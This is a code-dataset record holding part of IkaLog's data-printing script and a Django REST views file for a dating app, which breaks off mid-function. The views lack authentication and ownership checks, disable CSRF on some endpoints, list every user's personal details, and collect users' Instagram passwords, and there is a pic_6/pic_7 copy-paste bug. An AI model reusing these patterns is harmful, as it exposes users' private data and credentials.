WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# tools/print_data.py is a command to print out data analyzed by IkaLog.\n# Usage:\n# ./tools/print_data.py --json ika.json\n# ./tools/print_data.py --statink statink.msgpack\n\nimport argparse\nimport json\nimport os\nimport pprint\nimport sys\nimport time\nimport umsgpack\n\n# Append the Ikalog root dir to sys.path to import IkaUtils.\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport IkaConfig\nfrom ikalog.utils.statink_uploader import UploadToStatInk\nfrom ikalog.utils.ikautils import IkaUtils\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--statink', dest='statink', type=str)\n parser.add_argument('--json', dest='json', type=str)\n\n return vars(parser.parse_args())\n\n\ndef print_statink(filepath):\n with open(filepath, 'rb') as data:\n payload = umsgpack.unpack(data)\n\n if 'image_result' in payload:\n payload['image_result'] = '(PNG Data)'\n\n if 'image_judge' in payload:\n payload['image_judge'] = '(PNG Data)'\n\n if 'image_gear' in payload:\n payload['image_gear'] = '(PNG Data)'\n\n if 'events' in payload:\n payload['events'] = '(Events)'\n\n pprint.pprint(payload)\n\n\ndef print_json(filepath):\n with open(filepath, 'r') as data:\n for line in data:\n if not line.rstrip():\n continue\n json_data = json.loads(line)\n print(json.dumps(json_data, sort_keys=True, ensure_ascii=False,\n indent=2, separators=(',', ': ')))\n\n\ndef main():\n args = get_args()\n if args.get('statink'):\n print_statink(args['statink'])\n elif args.get('json'):\n print_json(args['json'])\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/print_data.py", "file_name": "print_data.py", "file_ext": "py", "file_size_in_byte": 2412, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "sys.path.append", "line_number": 35, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 35, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 42, "usage_type": "call"}, {"api_name": "umsgpack.unpack", "line_number": 51, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 65, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 73, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "167990352", "text": "import os\nimport shutil\n\nimport instaloader\nfrom django.contrib.auth import get_user_model\nfrom django.db.models import Q\nfrom django.utils import timezone\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django_filters import rest_framework\nfrom rest_framework.generics import CreateAPIView, ListAPIView, UpdateAPIView, ListCreateAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_201_CREATED, HTTP_400_BAD_REQUEST, HTTP_200_OK\nfrom rest_framework.views import APIView\n\nfrom .models import UserInstagramPic, UserDetail, RegisterUser, MatchedUser, RequestMeeting, ScheduleMeeting, Feedback, \\\n AboutUs, ContactUs, InAppNotification, SubscriptionPlans\nfrom .serializers import (UserDetailSerializer, UserInstagramSerializer, RegisterSerializer,\n MatchedUserSerializer, LikeSerializer, DeleteMatchSerializer, SuperLikeSerializer,\n RequestMeetingSerializer, ScheduleMeetingSerializer, FeedbackSerializer, ContactUsSerializer,\n AboutUsSerializer, MeetingStatusSerializer, PopUpNotificationSerializer,\n SubscriptionPlanSerializer, DeleteSuperMatchSerializer, SearchSerializer,\n GetInstagramPicSerializer, SocialUserSerializer, ShowInstaPics)\n\nUser = get_user_model()\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserCreateAPIView(CreateAPIView):\n serializer_class = RegisterSerializer\n\n def post(self, request, *args, **kwargs):\n serializer = RegisterSerializer(data=self.request.data)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n phone_number = self.request.data['phone_number']\n gender = self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n job_profile = self.request.data['job_profile']\n company_name = self.request.data['company_name']\n email = self.request.data['email']\n qualification = self.request.data['qualification']\n relationship_status = self.request.data['relationship_status']\n interests = self.request.data['interests']\n fav_quote = self.request.data['fav_quote']\n # liked_by = RegisterUser.objects.filter(id=phone_number)\n # superliked_by = RegisterUser.objects.filter(id=phone_number)\n pic_1 = self.request.data['pic_1']\n pic_2 = self.request.data['pic_2']\n pic_3 = self.request.data['pic_3']\n pic_4 = self.request.data['pic_4']\n pic_5 = self.request.data['pic_5']\n pic_6 = self.request.data['pic_6']\n pic_7 = self.request.data['pic_7']\n pic_8 = self.request.data['pic_8']\n pic_9 = self.request.data['pic_9']\n user_qs = RegisterUser.objects.filter(\n phone_number__iexact=phone_number)\n if user_qs.exists():\n serializer.is_valid(raise_exception=True)\n return Response({\"Phone number\": \"User with this phone number already exists.\"},\n status=HTTP_400_BAD_REQUEST)\n if serializer.is_valid():\n user = RegisterUser.objects.create(\n email=email,\n first_name=first_name,\n last_name=last_name,\n phone_number=phone_number,\n gender=gender,\n date_of_birth=date_of_birth,\n job_profile=job_profile,\n company_name=company_name,\n qualification=qualification,\n relationship_status=relationship_status,\n interests=interests,\n fav_quote=fav_quote,\n # liked_by=liked_by,\n # superliked_by=superliked_by,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9\n )\n UserDetail.objects.create(\n phone_number=user\n )\n\n # for x in liked_by:\n # RegisterUser.liked_by.add(x)\n # for y in superliked_by:\n # RegisterUser.superliked_by.add(y)\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_7 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created sucessfully\", \"Data\": Data},\n status=HTTP_201_CREATED)\n\n\n# class GetUserToken(ObtainAuthToken):\n# serializer_class = GetUserTokenSerializer\n\n# def post(self, request, *args, **kwargs):\n# phone_number = self.request.data['phone_number']\n# user = RegisterUser.objects.get(phone_number=phone_number).user\n# print('--------------->>>>>>',user)\n# try:\n# user_with_token = Token.objects.get(user=user)\n# print('TRY-------------->>>',user_with_token)\n# if user_with_token:\n# print('TRY If-------------->>>',user_with_token)\n# return Response({\"Token\": user_with_token.key})\n# except Exception as e:\n# print(e)\n# token = Token.objects.create(user=user)\n# print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>', token)\n# return Response({\"Token\": token.key}, status=HTTP_200_OK)\n\n\nclass UpdatePhoneNumber(UpdateAPIView):\n serializer_class = RegisterSerializer\n queryset = RegisterUser.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.phone_number = request.data.get('phone_number')\n instance.save(update_fields=['phone_number'])\n logged_in_user_id = self.request.data['id']\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Phone Number Update\",\n notification_title=\"Phone Number\",\n notification_body=\"Your Phone number has been updated\"\n )\n return Response({\"Your phone number has been update\"}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserProfileAPIView(ListCreateAPIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n id = self.request.GET.get('id')\n user = UserDetail.objects.get(id=id)\n if user.phone_number.pic_1:\n pic_1 = user.phone_number.pic_1.url\n else:\n pic_1 = ''\n if user.phone_number.pic_2:\n pic_2 = user.phone_number.pic_2.url\n else:\n pic_2 = ''\n if user.phone_number.pic_3:\n pic_3 = user.phone_number.pic_3.url\n else:\n pic_3 = ''\n if user.phone_number.pic_4:\n pic_4 = user.phone_number.pic_4.url\n else:\n pic_4 = ''\n if user.phone_number.pic_5:\n pic_5 = user.phone_number.pic_5.url\n else:\n pic_5 = ''\n if user.phone_number.pic_6:\n pic_6 = user.phone_number.pic_6.url\n else:\n pic_6 = ''\n if user.phone_number.pic_7:\n pic_7 = user.phone_number.pic_7.url\n else:\n pic_7 = ''\n if user.phone_number.pic_8:\n pic_8 = user.phone_number.pic_8.url\n else:\n pic_8 = ''\n if user.phone_number.pic_9:\n pic_9 = user.phone_number.pic_9.url\n else:\n pic_9 = ''\n detail = {\n \"id\": user.id,\n \"bio\": user.bio,\n \"first_name\": user.phone_number.first_name,\n \"last_name\": user.phone_number.last_name,\n \"email\": user.phone_number.email,\n \"gender\": user.phone_number.gender,\n \"date_of_birth\": user.phone_number.date_of_birth,\n \"job_profile\": user.phone_number.job_profile,\n \"company_name\": user.phone_number.company_name,\n \"qualification\": user.phone_number.qualification,\n \"relationship_status\": user.phone_number.relationship_status,\n \"interests\": user.phone_number.interests,\n \"fav_quote\": user.phone_number.fav_quote,\n \"religion\": user.phone_number.religion,\n \"body_type\": user.phone_number.body_type,\n \"verified\": user.phone_number.verified,\n \"fb_signup\": user.phone_number.fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": user.living_in,\n \"hometown\": user.hometown,\n \"profession\": user.profession,\n \"college_name\": user.college_name,\n \"university\": user.university,\n \"personality\": user.personality,\n \"preference_first_date\": user.preference_first_date,\n \"fav_music\": user.fav_music,\n \"food_type\": user.food_type,\n \"owns\": user.owns,\n \"travelled_place\": user.travelled_place,\n \"once_in_life\": user.once_in_life,\n \"exercise\": user.exercise,\n \"looking_for\": user.looking_for,\n \"fav_food\": user.fav_food,\n \"fav_pet\": user.fav_pet,\n \"smoke\": user.smoke,\n \"drink\": user.drink,\n \"subscription_purchased\": user.subscription_purchased,\n \"subscription_purchased_at\": user.subscription_purchased_at,\n }\n return Response(detail, HTTP_200_OK)\n\n\nclass UserProfileUpdateView(UpdateAPIView):\n serializer_class = UserDetailSerializer\n queryset = UserDetail.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.bio = request.data.get(\"bio\")\n instance.living_in = request.data.get(\"living_in\")\n instance.hometown = request.data.get(\"hometown\")\n instance.profession = request.data.get(\"profession\")\n instance.college_name = request.data.get(\"college_name\")\n instance.university = request.data.get(\"university\")\n instance.personality = request.data.get(\"personality\")\n instance.preference_first_date = request.data.get(\n \"preference_first_date\")\n instance.fav_music = request.data.get(\"fav_music\")\n instance.food_type = request.data.get(\"food_type\")\n instance.owns = request.data.get(\"owns\")\n instance.travelled_place = request.data.get(\"travelled_place\")\n instance.once_in_life = request.data.get(\"once_in_life\")\n instance.exercise = request.data.get(\"exercise\")\n instance.looking_for = request.data.get(\"looking_for\")\n instance.fav_food = request.data.get(\"fav_food\")\n instance.fav_pet = request.data.get(\"fav_pet\")\n instance.smoke = request.data.get(\"smoke\")\n instance.drink = request.data.get(\"drink\")\n instance.subscription_purchased = request.data.get(\n \"subscription_purchased\")\n instance.subscription_purchased_at = request.data.get(\n \"subscription_purchased_at\")\n id = request.data.get(\"subscription\")\n id = int(id)\n subscription = SubscriptionPlans.objects.get(id=id)\n instance.subscription = subscription\n instance.save(\n update_fields=['bio', 'phone_number', 'living_in', 'hometown', 'profession', 'college_name', 'university',\n 'personality', 'preference_first_date', 'fav_music', 'travelled_place',\n 'once_in_life', 'exercise', 'looking_for', 'fav_food', 'owns', 'food_type', 'fav_pet',\n 'smoke', 'drink',\n 'subscription_purchased', 'subscription_purchased_at', 'subscription'])\n from_id = User.objects.filter(is_superuser=True)[0].id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Profile Update\",\n notification_title=\"Profile Update\",\n notification_body=\"Your profile has been updated\"\n )\n\n return Response({\"Profile update successfully\"}, status=HTTP_200_OK)\n\n\nclass GetUserInstagramPics(APIView):\n serializer_class = GetInstagramPicSerializer\n\n def post(self, request, *args, **kwargs):\n username = self.request.data['username']\n password = self.request.data['password']\n loader = instaloader.Instaloader()\n USERNAME = username\n PASSWORD = password\n DOWNLOADED_POST_DIRECTORY = \"Fetched_Posts\"\n try:\n loader.login(USERNAME, PASSWORD)\n except Exception as e:\n x = {\"Error\": str(e)}\n return Response(x[\"Error\"], status=HTTP_400_BAD_REQUEST)\n posts_array = instaloader.Profile.from_username(\n loader.context, USERNAME).get_posts()\n count = 0\n images = []\n number_of_posts = 0\n for post in posts_array:\n loader.download_post(post, DOWNLOADED_POST_DIRECTORY)\n number_of_posts += 1\n if number_of_posts == 10:\n break\n for f in os.listdir('./Fetched_Posts'):\n if f.endswith('.jpg'):\n while count < 10:\n images.append(f)\n count += 1\n break\n if os.path.isdir(\"Fetched_Posts\"):\n shutil.rmtree(\"Fetched_Posts\")\n print(\"Deleted folder {} successfully\".format(\"Fetched_Posts\"))\n return Response({\"Success\": \"Downloaded images from instagram successfully\", \"Images\": images},\n status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass UserInstagramPicsAPIView(CreateAPIView):\n serializer_class = UserInstagramSerializer\n\n def post(self, request, *args, **kwargs):\n phone_number = self.request.data['id']\n p_no = RegisterUser.objects.get(id=phone_number)\n insta_pic_1 = self.request.data['insta_pic_1']\n insta_pic_2 = self.request.data['insta_pic_2']\n insta_pic_3 = self.request.data['insta_pic_3']\n insta_pic_4 = self.request.data['insta_pic_4']\n insta_pic_5 = self.request.data['insta_pic_5']\n insta_pic_6 = self.request.data['insta_pic_6']\n insta_pic_7 = self.request.data['insta_pic_7']\n insta_pic_8 = self.request.data['insta_pic_8']\n insta_pic_9 = self.request.data['insta_pic_9']\n insta_pic_10 = self.request.data['insta_pic_10']\n UserInstagramPic.objects.create(\n phone_number=p_no,\n insta_pic_1=insta_pic_1,\n insta_pic_2=insta_pic_2,\n insta_pic_3=insta_pic_3,\n insta_pic_4=insta_pic_4,\n insta_pic_5=insta_pic_5,\n insta_pic_6=insta_pic_6,\n insta_pic_7=insta_pic_7,\n insta_pic_8=insta_pic_8,\n insta_pic_9=insta_pic_9,\n insta_pic_10=insta_pic_10,\n insta_connect=True\n )\n return Response({\"Success\": \"Images uploaded from instagram successfully\"},\n status=HTTP_201_CREATED)\n\n\nclass ShowInstagramPics(ListAPIView):\n serializer_class = ShowInstaPics\n\n def get(self, request, *args, **kwargs):\n id = self.request.GET.get('phone_number')\n try:\n pics = UserInstagramPic.objects.get(phone_number=id)\n if pics:\n insta_pic_1 = pics.insta_pic_1\n insta_pic_2 = pics.insta_pic_2\n insta_pic_3 = pics.insta_pic_3\n insta_pic_4 = pics.insta_pic_4\n insta_pic_5 = pics.insta_pic_5\n insta_pic_6 = pics.insta_pic_6\n insta_pic_7 = pics.insta_pic_7\n insta_pic_8 = pics.insta_pic_8\n insta_pic_9 = pics.insta_pic_9\n insta_pic_10 = pics.insta_pic_10\n pics = {\n \"insta_pic_1\": insta_pic_1,\n \"insta_pic_2\": insta_pic_2,\n \"insta_pic_3\": insta_pic_3,\n \"insta_pic_4\": insta_pic_4,\n \"insta_pic_5\": insta_pic_5,\n \"insta_pic_6\": insta_pic_6,\n \"insta_pic_7\": insta_pic_7,\n \"insta_pic_8\": insta_pic_8,\n \"insta_pic_9\": insta_pic_9,\n \"insta_pic_10\": insta_pic_10,\n }\n return Response({\"pics\": pics}, status=HTTP_200_OK)\n except:\n return Response({\"No instagram pics\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass UserslistAPIView(APIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n # queryset needed to be filtered\n logged_in_user_id = self.request.GET.get('id')\n # queryset1 = RegisterUser.objects.all().exclude(id=logged_in_user_id).values()\n users = []\n # for obj in queryset1:\n # users.append(obj)\n # return Response({\"Users\":users}, HTTP_200_OK)\n if (UserDetail.objects.all().exclude(id=logged_in_user_id)).count() > 0:\n for obj in UserDetail.objects.all().exclude(id=logged_in_user_id):\n id = obj.id\n bio = obj.bio\n first_name = obj.phone_number.first_name\n last_name = obj.phone_number.last_name\n email = obj.phone_number.email\n gender = obj.phone_number.gender\n date_of_birth = obj.phone_number.date_of_birth\n job_profile = obj.phone_number.job_profile\n company_name = obj.phone_number.company_name\n qualification = obj.phone_number.qualification\n relationship_status = obj.phone_number.relationship_status\n interests = obj.phone_number.interests\n fav_quote = obj.phone_number.fav_quote\n religion = obj.phone_number.religion\n body_type = obj.phone_number.body_type\n verified = obj.phone_number.verified\n fb_signup = obj.phone_number.fb_signup\n if obj.phone_number.pic_1:\n pic_1 = obj.phone_number.pic_1.url\n else:\n pic_1 = ''\n if obj.phone_number.pic_2:\n pic_2 = obj.phone_number.pic_2.url\n else:\n pic_2 = ''\n if obj.phone_number.pic_3:\n pic_3 = obj.phone_number.pic_3.url\n else:\n pic_3 = ''\n if obj.phone_number.pic_4:\n pic_4 = obj.phone_number.pic_4.url\n else:\n pic_4 = ''\n if obj.phone_number.pic_5:\n pic_5 = obj.phone_number.pic_5.url\n else:\n pic_5 = ''\n if obj.phone_number.pic_6:\n pic_6 = obj.phone_number.pic_6.url\n else:\n pic_6 = ''\n if obj.phone_number.pic_7:\n pic_7 = obj.phone_number.pic_7.url\n else:\n pic_7 = ''\n if obj.phone_number.pic_8:\n pic_8 = obj.phone_number.pic_8.url\n else:\n pic_8 = ''\n if obj.phone_number.pic_9:\n pic_9 = obj.phone_number.pic_9.url\n else:\n pic_9 = ''\n living_in = obj.living_in\n hometown = obj.hometown\n profession = obj.profession\n college_name = obj.college_name\n university = obj.university\n personality = obj.personality\n preference_first_date = obj.preference_first_date\n fav_music = obj.fav_music\n travelled_place = obj.travelled_place\n once_in_life = obj.once_in_life\n exercise = obj.exercise\n looking_for = obj.looking_for\n fav_food = obj.fav_food\n fav_pet = obj.fav_pet\n smoke = obj.smoke\n drink = obj.drink\n subscription_purchased = obj.subscription_purchased\n subscription_purchased_at = obj.subscription_purchased_at\n # subscription = obj.subscription.values()\n detail = {\n \"id\": id,\n \"bio\": bio,\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"job_profile\": job_profile,\n \"company_name\": company_name,\n \"qualification\": qualification,\n \"relationship_status\": relationship_status,\n \"interests\": interests,\n \"fav_quote\": fav_quote,\n \"religion\": religion,\n \"body_type\": body_type,\n \"verified\": verified,\n \"fb_signup\": fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": living_in,\n \"hometown\": hometown,\n \"profession\": profession,\n \"college_name\": college_name,\n \"university\": university,\n \"personality\": personality,\n \"preference_first_date\": preference_first_date,\n \"fav_music\": fav_music,\n \"travelled_place\": travelled_place,\n \"once_in_life\": once_in_life,\n \"exercise\": exercise,\n \"looking_for\": looking_for,\n \"fav_food\": fav_food,\n \"fav_pet\": fav_pet,\n \"smoke\": smoke,\n \"drink\": drink,\n \"subscription_purchased\": subscription_purchased,\n \"subscription_purchased_at\": subscription_purchased_at,\n # \"subscription\": subscription\n }\n users.append(detail)\n return Response(users, HTTP_200_OK)\n else:\n return Response({\"There are no users\"}, status=HTTP_200_OK)\n\n\nclass UserDetailAPIView(APIView):\n model = UserDetail\n serializer_class = UserDetailSerializer\n\n def get(self, request, *args, **kwargs):\n phone_number = self.request.GET.get('id')\n # queryset = UserDetail.objects.filter(id=phone_number).values()\n queryset = UserDetail.objects.filter(id=phone_number)\n for obj in queryset:\n bio = obj.bio\n first_name = obj.phone_number.first_name\n last_name = obj.phone_number.last_name\n email = obj.phone_number.email\n gender = obj.phone_number.gender\n date_of_birth = obj.phone_number.date_of_birth\n dob = str(date_of_birth)\n x = dob.split('-')\n y = str(timezone.now().date())\n current_year = y.split('-')\n age = int(current_year[0]) - int(x[0])\n job_profile = obj.phone_number.job_profile\n company_name = obj.phone_number.company_name\n qualification = obj.phone_number.qualification\n relationship_status = obj.phone_number.relationship_status\n interests = obj.phone_number.interests\n fav_quote = obj.phone_number.fav_quote\n religion = obj.phone_number.religion\n body_type = obj.phone_number.body_type\n verified = obj.phone_number.verified\n fb_signup = obj.phone_number.fb_signup\n if obj.phone_number.pic_1:\n pic_1 = obj.phone_number.pic_1.url\n else:\n pic_1 = ''\n if obj.phone_number.pic_2:\n pic_2 = obj.phone_number.pic_2.url\n else:\n pic_2 = ''\n if obj.phone_number.pic_3:\n pic_3 = obj.phone_number.pic_3.url\n else:\n pic_3 = ''\n if obj.phone_number.pic_4:\n pic_4 = obj.phone_number.pic_4.url\n else:\n pic_4 = ''\n if obj.phone_number.pic_5:\n pic_5 = obj.phone_number.pic_5.url\n else:\n pic_5 = ''\n if obj.phone_number.pic_6:\n pic_6 = obj.phone_number.pic_6.url\n else:\n pic_6 = ''\n if obj.phone_number.pic_7:\n pic_7 = obj.phone_number.pic_7.url\n else:\n pic_7 = ''\n if obj.phone_number.pic_8:\n pic_8 = obj.phone_number.pic_8.url\n else:\n pic_8 = ''\n if obj.phone_number.pic_9:\n pic_9 = obj.phone_number.pic_9.url\n else:\n pic_9 = ''\n living_in = obj.living_in\n hometown = obj.hometown\n profession = obj.profession\n college_name = obj.college_name\n university = obj.university\n personality = obj.personality\n preference_first_date = obj.preference_first_date\n fav_music = obj.fav_music\n travelled_place = obj.travelled_place\n once_in_life = obj.once_in_life\n exercise = obj.exercise\n looking_for = obj.looking_for\n food_type = obj.food_type\n owns = obj.owns\n fav_food = obj.fav_food\n fav_pet = obj.fav_pet\n smoke = obj.smoke\n drink = obj.drink\n subscription_purchased = obj.subscription_purchased\n subscription_purchased_at = obj.subscription_purchased_at\n # subscription = obj.subscription.values()\n detail = {\n \"bio\": bio,\n \"first_name\": first_name,\n \"last_name\": last_name,\n \"email\": email,\n \"gender\": gender,\n \"date_of_birth\": date_of_birth,\n \"age\": age,\n \"job_profile\": job_profile,\n \"company_name\": company_name,\n \"qualification\": qualification,\n \"relationship_status\": relationship_status,\n \"interests\": interests,\n \"fav_quote\": fav_quote,\n \"religion\": religion,\n \"body_type\": body_type,\n \"verified\": verified,\n \"fb_signup\": fb_signup,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n \"living_in\": living_in,\n \"hometown\": hometown,\n \"profession\": profession,\n \"college_name\": college_name,\n \"university\": university,\n \"personality\": personality,\n \"preference_first_date\": preference_first_date,\n \"fav_music\": fav_music,\n \"travelled_place\": travelled_place,\n \"once_in_life\": once_in_life,\n \"exercise\": exercise,\n \"looking_for\": looking_for,\n \"food_type\": food_type,\n \"owns\": owns,\n \"fav_food\": fav_food,\n \"fav_pet\": fav_pet,\n \"smoke\": smoke,\n \"drink\": drink,\n \"subscription_purchased\": subscription_purchased,\n \"subscription_purchased_at\": subscription_purchased_at,\n # \"subscription\": subscription\n }\n return Response({\"Details\": detail}, status=HTTP_200_OK)\n return Response({\"Details\": queryset}, status=HTTP_200_OK)\n\n\nclass SnippetFilter(rest_framework.FilterSet):\n qualification = rest_framework.CharFilter(lookup_expr='exact')\n relationship_status = rest_framework.CharFilter(lookup_expr='exact')\n religion = rest_framework.CharFilter(lookup_expr='exact')\n body_type = rest_framework.CharFilter(lookup_expr='exact')\n gender = rest_framework.CharFilter(lookup_expr='exact')\n interests = rest_framework.CharFilter(lookup_expr='exact')\n\n class Meta:\n model = RegisterUser\n fields = ['qualification', 'relationship_status',\n 'religion', 'body_type', 'gender', 'interests']\n # fileds = {\n # 'qualification': ['icontains'],\n # 'relationship_status': ['icontains'],\n # 'religion': ['icontains'],\n # 'body_type': ['icontains'],\n # 'gender': ['icontains'],\n # 'interests': ['icontains'],\n #\n # }\n\n\n# class SearchUser(ListCreateAPIView):\n# model = RegisterUser\n# serializer_class = RegisterSerializer\n# filter_backends = (rest_framework.DjangoFilterBackend,)\n# filterset_class = SnippetFilter\n# queryset = RegisterUser.objects.all()\n\n# def get_queryset(self):\n# queryset = RegisterUser.objects.all()\n# print(self.request.data)\n# qualification = self.request.GET.get('qualification', None)\n# relationship_status = self.request.GET.get('relationship_status', None)\n# religion = self.request.GET.get('religion', None)\n# body_type = self.request.GET.get('body_type', None)\n# gender = self.request.GET.get('gender', None)\n# interests = self.request.GET.get('interests', None)\n# relationship_status = self.request.data['relationship_status']\n# religion = self.request.data['religion']\n# body_type = self.request.data['body_type']\n# gender = self.request.data['gender']\n# interests = self.request.data['interests']\n# print('Qualification ', qualification)\n# if qualification is not None:\n# queryset = RegisterUser.objects.filter(Q(qualification__exact=qualification) |\n# Q(relationship_status__exact=relationship_status) |\n# Q(interests__exact=interests) |\n# Q(gender__exact=gender) |\n# Q(religion__exact=religion) |\n# Q(body_type__exact=body_type)\n# )\n# print('>>>>>>>>>>>>>>>>>>>>', queryset)\n# return queryset\n\n\nclass SearchUser(CreateAPIView):\n serializer_class = SearchSerializer\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n # print('>>>>>>>>>>>>>>>>>',data)\n qualification = self.request.data['qualification']\n relationship_status = self.request.data['relationship_status']\n religion = self.request.data['religion']\n body_type = self.request.data['body_type']\n gender = self.request.data['gender']\n interests = self.request.data['interests']\n # qualification = self.request.POST.get('qualification', None)\n # relationship_status = self.request.POST.get('relationship_status', None)\n # religion = self.request.POST.get('religion', None)\n # body_type = self.request.POST.get('body_type', None)\n # gender = self.request.POST.get('gender', None)\n # interests = self.request.POST.get('interests', None)\n if data:\n qs = RegisterUser.objects.filter(Q(qualification__exact=qualification) &\n Q(relationship_status__exact=relationship_status) &\n Q(interests__exact=interests) &\n Q(gender__exact=gender) &\n Q(religion__exact=religion) &\n Q(body_type__exact=body_type)\n ).values()\n return Response(qs, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass LikeUserAPIView(CreateAPIView):\n model = MatchedUser\n serializer_class = LikeSerializer\n\n def post(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n users_liked_by_me = MatchedUser.objects.filter(\n liked_by_me=logged_in_user_id)\n users_liked_by_me_list = []\n for obj in users_liked_by_me:\n y = obj.user.id\n users_liked_by_me_list.append(y)\n liked_by_me = self.request.data['liked_by_me']\n\n if int(liked_by_me) not in users_liked_by_me_list:\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(user=register_user, matched='No')\n user.liked_by_me.add(liked_by_me)\n to_user_id = RegisterUser.objects.get(id=liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Like Notification',\n notification_title='Like Notification',\n notification_body=\"You have been liked by \" + from_user_name\n )\n return Response({\"You have liked a user\"}, status=HTTP_200_OK)\n else:\n liked_by_me = self.request.data['liked_by_me']\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, matched='Yes')\n user.liked_by_me.add(liked_by_me)\n to_user_id = RegisterUser.objects.get(id=liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n 